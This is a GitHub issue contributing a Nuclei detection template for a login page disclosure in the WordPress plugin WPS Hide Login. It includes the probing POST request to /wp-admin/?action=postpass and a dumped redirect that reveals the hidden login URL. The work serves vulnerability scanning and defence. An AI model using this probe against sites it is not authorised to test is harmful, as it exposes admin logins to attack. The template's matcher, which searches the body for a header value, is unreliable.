### ISSUE TITLE
[TEMPLATE CONTRIBUTION] WPS Hide Login <= 1.9.15.2 - Login Page Disclosure

### ISSUE THREAD

**Issue by popcorn94** [projectdiscovery/nuclei-templates#11884]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: WPS Hide Login <= 1.9.15.2 - Login Page Disclosure

info:
  name: WPS Hide Login <= 1.9.15.2 - Login Page Disclosure
  author: popcorn94
  severity: low
  description: |
    The WPS Hide Login plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 1.9.15.2. This is due to a bypass that is created when the 'action=postpass' parameter is supplied. This makes it possible for attackers to easily discover any login page that may have been hidden by the plugin.
  reference: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/?action=postpass"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Location"
        condition: and

      - type: status
        status:
          - 302
```

### Relevant dumped responses

```shell
HTTP/1.1 302 Found
Date: Mon, 08 Jul 2024 14:01:01 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Powered-By: PHP/8.0.30
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://localhost/wordpress/login/?redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F%3Faction%3Dpostpass&reauth=1
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
```
